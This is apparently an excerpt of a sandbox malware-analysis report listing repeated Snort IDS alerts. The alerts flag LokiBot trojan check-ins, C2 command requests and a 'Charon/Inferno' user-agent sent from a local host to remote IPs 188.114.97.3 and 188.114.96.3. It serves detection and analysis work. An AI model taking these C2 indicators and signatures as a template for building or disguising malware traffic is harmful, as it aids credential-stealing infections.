Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49780 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49780 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49780 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49780 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49782 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49782 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49782 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49782 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49782 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49785 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49785 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49785 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49785 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49785 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49786 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49786 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49786 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49786 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49786 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49788 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49788 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49788 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49788 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49788 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49789 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49789 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49789 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49789 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49789 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49790 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49790 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49790 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49790 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49790 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49791 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49791 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49791 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49791 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49791 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49792 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49792 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49792 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49792 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49792 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49793 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49793 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49793 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49793 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49793 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49794 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49794 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49794 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49794 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49794 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49795 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49795 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49795 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49795 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49795 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49796 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49796 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49796 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49796 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49796 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49797 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49797 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49797 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49797 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49797 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49798 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49798 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49798 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49798 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49798 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49800 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49800 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49800 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49800 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49800 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49805 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49805 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49805 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49805 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49805 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49811 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49811 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49811 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49811 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49811 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49817 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49817 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49817 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49817 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49817 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49823 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49823 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49823 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49823 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49823 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49828 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49828 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49828 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49828 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49828 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49830 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49830 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49830 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49830 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49830 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49832 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49832 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49832 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49832 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49832 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49838 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49838 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49838 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49838 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49838 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49840 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49840 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49840 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49840 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49840 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49843 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49843 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49843 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49843 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49843 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49850 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49850 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49850 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49850 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49850 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49852 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49852 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49852 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49852 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49852 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49853 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49853 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49853 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49853 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49853 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49859 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49859 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49859 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49859 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49859 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49867 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49867 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49867 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49867 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49867 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49875 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49875 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49875 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49875 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49875 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49879 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49879 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49879 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49879 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49879 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49881 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49881 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49881 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49881 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49881 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49882 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49882 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49882 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49882 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49882 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49883 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49883 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49883 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49883 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49883 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49884 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49884 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49884 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49884 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49884 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49885 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49885 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49885 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49885 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49885 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49887 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49887 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49887 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49887 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49887 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49888 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49888 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49888 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49888 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49888 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49889 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49889 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49889 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49889 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49889 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49890 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49890 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49890 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49890 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49890 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49892 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49892 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49892 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49892 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49892 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49895 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49895 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49895 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49895 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49895 -> 188.114.97.3:80
